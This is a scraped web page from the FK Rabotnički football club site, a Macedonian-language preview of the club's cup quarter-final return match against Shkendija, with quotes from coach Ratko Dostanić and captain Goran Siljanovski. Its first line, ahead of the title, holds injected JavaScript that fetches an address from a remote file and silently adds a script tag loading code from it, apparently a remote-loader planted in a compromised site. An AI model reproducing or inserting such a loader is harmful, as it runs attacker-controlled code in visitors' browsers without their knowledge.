;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Четвртфинален куп предизвик против Шкендија
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Четвртфинален куп предизвик против Шкендија

Работнички денеска (14 часот) го игра реванш натпреварот од четвртфиналето на Купот на Македонија. Противник е Шкендија, а првиот меч во Тетово заврши 1-1. Тоа е релативно поволен резултат за нашиот тим, но секако отворен за голема битка и на вториот дуел на арената „Тодор Проески“.

Составот на Ратко Достаниќ оваа пролет има поинаков лик, забележа две победи и едно реми во првенството, а Купот е можеби шанса и за излез на меѓународна сцена.

„Ова е нов предизвик за нас, верувам дека тимот ќе го даде максимумот“, вели шефот на стручниот штаб, Ратко Достаниќ.

Капитенот Горан Силјановски верува дека Работнички може да одигра квалитетно и да ја оствари целта.

„Имаме поволен резултат по првиот натпревар, но има уште тешки 90 минути за игра. Подготвени сме, ќе се потрудиме да ја изненадиме Шкендија и да се пласираме во следната рунда“, вели Силјановски.

Мечот меѓу Работнички и Шкендија е закажан за 14 часот на арената „Тодор Проески“, а ќе го суди Васко Мавров од Струмица. Натпреварот ќе се игра без присуство на публика.